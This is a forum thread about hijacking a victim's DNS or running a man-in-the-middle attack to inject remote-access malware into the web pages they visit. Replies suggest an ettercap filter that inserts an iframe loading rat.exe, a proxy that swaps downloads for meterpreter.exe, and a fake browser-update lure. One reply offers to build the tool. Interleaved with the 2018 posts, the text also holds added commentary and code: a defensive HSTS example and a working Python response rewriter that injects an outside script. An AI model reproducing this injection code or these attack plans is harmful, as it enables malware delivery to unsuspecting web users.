anao00 Posted October 18, 2018
Let's say I've managed to change my target's DNS. How could I inject a payload (from a RAT) directly into the webpage of my victim? I don't want them to get redirected to a fake website, I just want to inject them with malicious code.
anao00 (Author) Posted October 18, 2018
Nice, the forum doesn't allow the OP to edit his own thread. What I wanted to do was to have the user type in a website domain and get the contents of that website altered so I could add some code to it, and I wanted to do that only by changing his DNS servers. I don't know how practical that is, I just wanted to know if it's possible, and how.
bg-wa Posted October 18, 2018
I made this a few weeks ago: https://github.com/bg-wa/rails_in_the_middle
Set up the app and point your DNS to it, point the app to the site you want to modify, and inject whatever code you want before it's sent to the user (it also works in the other direction, sending data to the original server).
*Also not sure how practical this is, but it's possible.
i8igmac Posted October 18, 2018
There might already be some man-in-the-middle tools that provide this type of technique. To do this yourself will take research; it's not that hard to accomplish, but also not that simple to explain. The quickest suggestion I have is an ettercap filter. What I have done in the past with an ettercap filter is replace an HTML string like </TITLE> with your payload, </TITLE><iframe SRC=rat.exe>. Do research on ettercap. Learn what works and does not work.
anao00 (Author) Posted October 18, 2018
5 hours ago, bg-wa said:
I made this a few weeks ago: https://github.com/bg-wa/rails_in_the_middle Set up the app and point your DNS to it, point the app to the site you want to modify, and inject whatever code you want before it's sent to the user (it also works in the other direction, sending data to the original server). *Also not sure how practical this is, but it's possible.

Do I need to be locally present, close to the target? If I set up rails_in_the_middle on a web server that is also running a DNS server and then make, somehow, the user use that DNS instead of the ISP's, could I tamper with a request for www.amazon.com and add something to the index.html page? How could I possibly protect myself from that besides regularly checking my DNS to see if it's the correct one? I want to test that thing. I spent almost 2 days thinking about this and trying to figure out ways to make it work, and then how to make it not work on my machines. Haha.
i8igmac Posted October 19, 2018
1 hour ago, anao00 said:
Do I need to be locally present, close to the target? If I set up rails_in_the_middle on a web server that is also running a DNS server and then make, somehow, the user use that DNS instead of the ISP's, could I tamper with a request for www.amazon.com and add something to the index.html page? How could I possibly protect myself from that besides regularly checking my DNS to see if it's the correct one? I want to test that thing. I spent almost 2 days thinking about this and trying to figure out ways to make it work, and then how to make it not work on my machines. Haha.

For what you want to do, man-in-the-middle vs Amazon may be impossible with publicly available tools... You should learn this stuff. Follow an ettercap filter tutorial... follow sslstrip tutorials... It might work if by chance the web surfer visits an out-of-date web server, or if the advertisement on the screen uses HTTP or otherwise unencrypted traffic... I have a video of doing exactly what you're asking for. I made a MITM Ruby proxy that would replace any executable with a meterpreter.exe during the download process. It would depend on the traffic not being encrypted, or at least on sslstrip working.
Dave-ee Jones Posted October 19, 2018
17 hours ago, anao00 said:
Let's say I've managed to change my target's DNS

..."Theoretically"?

14 hours ago, anao00 said:
Nice, the forum doesn't allow the OP to edit his own thread.

You can't edit your posts as a new user. You have to have a certain number of posts before you're given that privilege. It can be annoying, but if you don't rush your post it's not a problem.

14 hours ago, anao00 said:
What I wanted to do was to have the user type in a website domain and get the contents of that website altered so I could add some code to it, and I wanted to do that only by changing his DNS servers.

Change his DNS servers to point at a replica page you created based on the real site. Make the changes you want. That's what everyone else does, unfortunately. No-lifers preying on people who don't know how dangerous the internet can be. You would know how to do this by simply having general knowledge about DNS servers, HTTP ports and web servers. Maybe JS/PHP, depending on the type of payload. Information you could get anywhere. But you know, of course you wouldn't ever be immediately malicious to someone, because you obviously sound like you have tonnes of experience and are definitely not asking very to-the-point questions.
i8igmac Posted October 19, 2018
Ok. I have an idea: a proxy that clones the target or destination address.
GET /amazonDotCom
set toolkit-clone amazonDotCom
Provide a fresh cloned new response to the client.
This doesn't work on everything, but it's doable. arpspoof is the best MITM tool I use. iptables to redirect all traffic back and forth on the network, or from client <-> proxy-tamper.rb. Won't be hard to do in bash. Automate what you want to happen. I can make this for you. I prefer Ruby, but I have worked with people before that built half of a toolkit project. Direct message me.
bg-wa Posted October 19, 2018
@anao00 Yes, you are correct, DNS is a fragile system (in more ways than this example). Regardless of where you intercept, it can be difficult to detect. One thing not mentioned is SSL... you can use this method to host https://amazon.com at https://my-custom-domain.com or http://amazon.com, but you won't have the right cert on your middleware machine to host https://amazon.com. It's subtle, but browsers are doing a better job of pointing out non-secure sites lately.
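bg-wa's point is that the https://amazon.com name is out of reach without a valid certificate. The http://amazon.com fallback is also closed for any host the browser has already seen over valid HTTPS, because of HSTS (RFC 6797), which nobody in the thread names. The following is an added example, not code from any post or from a browser: a minimal HSTS cache showing why a hijacked resolver plus a plain-http listener does not get a request from a browser that knows the host, and where the gap remains (a host never visited before and not on the browser's preload list). The hosts, header values and timestamps are constructed for the example.

```python
"""Minimal HSTS (RFC 6797) cache: why a plain-http clone of a known site fails.

Added example, not code from any of the posts. A browser applies this logic
before it sends the request, so a host it has seen over validated HTTPS with a
Strict-Transport-Security header is fetched over https regardless of what DNS
answers, and the attacker is back to needing a valid cert for that name.
Hosts, headers and times below are constructed for the example.
"""
import re
from urllib.parse import urlsplit, urlunsplit

_MAX_AGE = re.compile(r"max-age\s*=\s*\"?(\d+)\"?", re.IGNORECASE)


def parse_hsts(header: str):
    """Return (max_age_seconds, include_subdomains) or None if invalid."""
    m = _MAX_AGE.search(header)
    if m is None:
        return None  # max-age is mandatory
    directives = [d.strip().lower() for d in header.split(";")]
    return int(m.group(1)), "includesubdomains" in directives


def record_hsts(cache: dict, host: str, header: str, now: float, over_tls: bool) -> bool:
    """Store or update an HSTS entry for `host` the way a browser does.

    The header is honoured only when it arrived over a TLS connection whose
    certificate validated (over_tls). On plain http it is ignored, which is
    exactly why an http-only clone can neither plant nor extend a policy.
    max-age=0 removes the entry.
    """
    if not over_tls:
        return False
    parsed = parse_hsts(header)
    if parsed is None:
        return False
    max_age, include_sub = parsed
    host = host.lower()
    if max_age == 0:
        cache.pop(host, None)
        return True
    cache[host] = {"expires": now + max_age, "include_subdomains": include_sub}
    return True


def is_hsts_host(cache: dict, host: str, now: float) -> bool:
    """Exact match, or a superdomain entry that set includeSubDomains."""
    labels = host.lower().split(".")
    for i in range(len(labels)):
        entry = cache.get(".".join(labels[i:]))
        if entry is None or entry["expires"] <= now:
            continue
        if i == 0 or entry["include_subdomains"]:
            return True
    return False


def upgrade_url(cache: dict, url: str, now: float) -> str:
    """Rewrite http:// to https:// when the host is a known HSTS host."""
    parts = urlsplit(url)
    if parts.scheme == "http" and is_hsts_host(cache, parts.hostname or "", now):
        netloc = parts.netloc[:-3] if parts.netloc.endswith(":80") else parts.netloc
        return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))
    return url


def demo() -> dict:
    """Constructed walk-through: a prior HTTPS visit, then the hijacked one."""
    cache = {}
    t0 = 1_000_000.0
    # Earlier, over a validated TLS connection, the real site sent HSTS.
    record_hsts(cache, "shop.example", "max-age=31536000; includeSubDomains", t0, True)
    # Later, DNS now points at the attacker, who only answers on plain http.
    later = t0 + 3600
    return {
        "known_host": upgrade_url(cache, "http://shop.example/", later),
        "subdomain": upgrade_url(cache, "http://www.shop.example/cart", later),
        "never_seen": upgrade_url(cache, "http://other.example/", later),
        "http_cannot_set": record_hsts(cache, "other.example", "max-age=60", later, False),
        "expired": upgrade_url(cache, "http://shop.example/", t0 + 31536000 + 1),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The "never_seen" and "expired" results are the practitioner's caveat: HSTS protects repeat visitors of a site that sets a long max-age (or is preloaded), not a first visit, so the defence bg-wa describes is only as good as the certificate check plus the user's prior history with that host.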
anao00 (Author) Posted October 19, 2018
19 hours ago, Dave-ee Jones said:
..."Theoretically"? You can't edit your posts as a new user. You have to have a certain number of posts before you're given that privilege. It can be annoying, but if you don't rush your post it's not a problem. Change his DNS servers to point at a replica page you created based on the real site. Make the changes you want. That's what everyone else does, unfortunately. No-lifers preying on people who don't know how dangerous the internet can be. You would know how to do this by simply having general knowledge about DNS servers, HTTP ports and web servers. Maybe JS/PHP, depending on the type of payload. Information you could get anywhere. But you know, of course you wouldn't ever be immediately malicious to someone, because you obviously sound like you have tonnes of experience and are definitely not asking very to-the-point questions.

Change the DNS > User gets redirected to my website even though the URL is the same, but there is no HTTPS, only HTTP > There is a warning saying that their browser or whatever is outdated, and it asks the user to download the update and install it > An undetectable payload is then installed. How could someone possibly defend themselves against this unless they know about MITM and the importance of HTTPS and checking the URL?

17 hours ago, i8igmac said:
Ok. I have an idea: a proxy that clones the target or destination address. GET /amazonDotCom, set toolkit-clone amazonDotCom, provide a fresh cloned new response to the client. This doesn't work on everything, but it's doable. arpspoof is the best MITM tool I use. iptables to redirect all traffic back and forth on the network, or from client <-> proxy-tamper.rb. Won't be hard to do in bash. Automate what you want to happen. I can make this for you. I prefer Ruby, but I have worked with people before that built half of a toolkit project. Direct message me.

I've been trying my luck with Python. Let's say I own a DNS server and a lot of other servers. The user goes through the DNS and then gets redirected to my website. The website detects the original URL that was intended, clones the desired page, poisons the data with what I want, and then delivers it to the user. The problem with SET is that it wasn't intended to be used for cloning and adding extra stuff. They made it so you could easily grab credentials by capturing POSTs. A little bit of code tweaking would be required. But it's not very practical, since the website would take too long to load, long enough that the user could google about his connection being slow and then find an article telling him to change his DNS.

2 hours ago, bg-wa said:
@anao00 Yes, you are correct, DNS is a fragile system (in more ways than this example). Regardless of where you intercept, it can be difficult to detect. One thing not mentioned is SSL... you can use this method to host https://amazon.com at https://my-custom-domain.com or http://amazon.com, but you won't have the right cert on your middleware machine to host https://amazon.com. It's subtle, but browsers are doing a better job of pointing out non-secure sites lately.

The only thing more fragile than DNS is basically every router out there. That is very concerning. It was possible not long ago to have a domain like amazon.com being fed to the user over HTTPS with a valid certificate, but the way you'd achieve that was by buying a domain that looked like amazon.com, where the "a" in amazon was actually the "a" from the Cyrillic alphabet or something. Some guy even coded a script for that. Now every updated browser will display a URL that looks like "xn----14811mazon.com" after the user clicks the link, so it's not very practical. But I noticed that most people don't even know what HTTPS is, and those who do know wouldn't question or try to figure out what is wrong if they accessed Google and the browser didn't display a green padlock. They typed google.com and it worked; that's what they care about.
i8igmac Posted October 19, 2018
It's all automation, like clockwork. If you clone the site, you could easily add or modify this data before it gets sent out.
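The step every approach in this thread shares, whether it is an ettercap filter swapping </TITLE>, rails_in_the_middle, or the clone-and-poison pipeline anao00 sketches in Python, is rewriting an HTTP response body in transit. The block below is an added example in Python, not code from any post, from ettercap or from rails_in_the_middle, and it shows the three details a naive string replace gets wrong: the closing tag must be matched case-insensitively (the sample page uses </TITLE>), a gzip-encoded body has to be decompressed before the match and re-sent as identity, and Content-Length has to be recomputed or the browser truncates the page. The sample response is constructed inline, the host injector.lab in the injected snippet is hypothetical, chunked transfer-coding is deliberately refused rather than handled, and nothing here touches HTTPS, which is the limitation the rest of the thread is about.

```python
"""Rewrite an HTTP/1.1 response so a snippet lands right after </title>.

Added example for this thread, not code from the posts, from ettercap or from
rails_in_the_middle. It performs the in-transit body rewrite that all of those
rely on and gets the framing right: case-insensitive tag match, transparent
gzip handling, and a recomputed Content-Length. The sample response is
constructed below; injector.lab is a made-up lab hostname.
"""
import gzip
import re

TITLE_CLOSE = re.compile(rb"</title\s*>", re.IGNORECASE)

# Constructed snippet; injector.lab is hypothetical.
SNIPPET = b'<script src="http://injector.lab/probe.js"></script>'


def _split_head(raw: bytes):
    """Return (status line, list of (name, value) headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def _header(headers, name: bytes):
    for n, v in headers:
        if n.lower() == name.lower():
            return v
    return None


def inject_after_title(raw: bytes, snippet: bytes = SNIPPET) -> bytes:
    """Return `raw` with `snippet` inserted after the first </title>.

    Non-HTML, chunked, or unknown-encoding responses are returned unchanged,
    as is any page without a <title>. A real proxy would dechunk first.
    """
    status, headers, body = _split_head(raw)

    ctype = _header(headers, b"Content-Type") or b""
    if not ctype.lower().startswith(b"text/html"):
        return raw
    if (_header(headers, b"Transfer-Encoding") or b"").lower() == b"chunked":
        return raw

    encoding = (_header(headers, b"Content-Encoding") or b"").lower()
    if encoding == b"gzip":
        body = gzip.decompress(body)
    elif encoding not in (b"", b"identity"):
        return raw  # br, deflate, ...: leave it alone rather than corrupt it

    m = TITLE_CLOSE.search(body)
    if m is None:
        return raw
    body = body[: m.end()] + snippet + body[m.end():]

    # Re-emit headers: drop Content-Encoding (the body is now plain bytes)
    # and replace Content-Length with the new body size.
    out = [status]
    for n, v in headers:
        if n.lower() in (b"content-length", b"content-encoding"):
            continue
        out.append(n + b": " + v)
    out.append(b"Content-Length: " + str(len(body)).encode())
    return b"\r\n".join(out) + b"\r\n\r\n" + body


# Constructed sample: a gzip-compressed page, as an origin that honoured
# Accept-Encoding: gzip would send it. Note the upper-case </TITLE>.
SAMPLE_HTML = b"<html><head><TITLE>Shop</TITLE></head><body>hi</body></html>"
SAMPLE_GZ = gzip.compress(SAMPLE_HTML)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    + b"Content-Type: text/html; charset=utf-8\r\n"
    + b"Content-Encoding: gzip\r\n"
    + b"Content-Length: " + str(len(SAMPLE_GZ)).encode() + b"\r\n"
    + b"\r\n"
    + SAMPLE_GZ
)


def demo() -> bytes:
    """Run the rewrite over the constructed sample response."""
    return inject_after_title(SAMPLE_RESPONSE)


if __name__ == "__main__":
    print(demo().decode("latin-1"))
```

The gzip branch is the part ettercap filter write-ups usually sidestep from the other direction, by mangling the request's Accept-Encoding header so the origin never compresses; doing the decompression on the response side instead, as here, works even when the request cannot be touched. Either way the Content-Length fix is mandatory: a body that grew by the length of the snippet behind an unchanged Content-Length is cut off by the browser and the appended tag never renders.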
Bigbiz Posted January 2, 2019
Buy a domain, set up a phoney website, inject code. See how long the site lasts. A tool called wifiphisher sets up a phoney web page to man-in-the-middle you. Looks like a normal router page? The only real way to alter web page code would be to break the law: copyright or domain trespass. If you tried it on amazon.com, I'm sure that it would trigger an alarm somewhere. Ever watch Hackers?